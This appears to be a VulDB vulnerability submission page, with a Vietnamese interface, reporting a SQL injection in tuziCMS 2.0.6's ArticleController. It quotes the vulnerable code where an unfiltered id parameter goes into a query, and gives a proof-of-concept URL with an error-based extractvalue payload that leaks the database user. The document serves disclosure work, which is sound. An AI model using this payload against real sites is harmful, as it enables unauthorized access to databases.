Gửi #71150: tuziCMS 2.0.6 App\Manage\Controller\ArticleController.class.php has SQLinjectthông tin

tiêu đềtuziCMS 2.0.6 App\Manage\Controller\ArticleController.class.php has SQLinject
Mô tảhello, i am a newcomer. First submission vulnerability. A vulnerability classified as serious was found. The article module does not filter the id parameter. Causes a SQL injection vulnerability.It can query sensitive data, operate database and other hazards. code: \App\Manage\Controller\ArticleController.class.php line: 18 - 22 public function index(){ C('TOKEN_ON',false);//关闭表单令牌 //查询指定id的栏目信息 $id=I('get.id');//类别ID $topcate=M('Column')->where("id=$id")->order('column_sort')->select(); // dump($topcate); // exit; POC: http: //127.0.0.1/tuzicms/index.php/Manage/Article/index/id/1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
Nguồn⚠️ https://github.com/yeyinshi/tuzicms/issues/12
Người dùng
 Evilmu1 (UID 38763)
Đệ trình12/01/2023 04:47 (cách đây 3 những năm)
Kiểm duyệt12/01/2023 15:46 (11 hours later)
Trạng tháiđược chấp nhận
Mục VulDB218151 [TuziCMS 2.0.6 Article ArticleController.class.php index ID Tiêm SQL]
điểm20

TrướcTổng QuanTiếp theo

Do you need the next level of professionalism?

Upgrade your account now!